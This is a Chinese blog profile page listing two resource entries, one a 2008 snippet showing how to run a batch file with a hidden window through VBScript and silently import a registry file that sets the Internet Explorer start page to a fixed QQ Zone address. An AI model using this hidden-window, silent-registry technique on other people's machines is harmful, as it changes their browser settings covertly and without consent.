• 博客(0)
  • 资源 (2)

空空如也

DevelopingaVisualWebPartinVisualStudio2010

DevelopingaVisualWebPartinVisualStudio2010

2010-06-25

vbs隐藏批处理运行窗口

用vbs隐藏批处理运行窗口set ws=wscript.createobject("wscript.shell") ws.run "Trextop.cmd /start",0 讲上面的代码保存为Trextop.vbs ______________________________________________________________________ @echo Windows Registry Editor Version 5.00>>Trextop.reg @echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]>>Trextop.reg @echo "Start Page"="http://77879791.qzone.qq.com">>Trextop.reg regedit /s Trextop.reg

2008-11-21

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除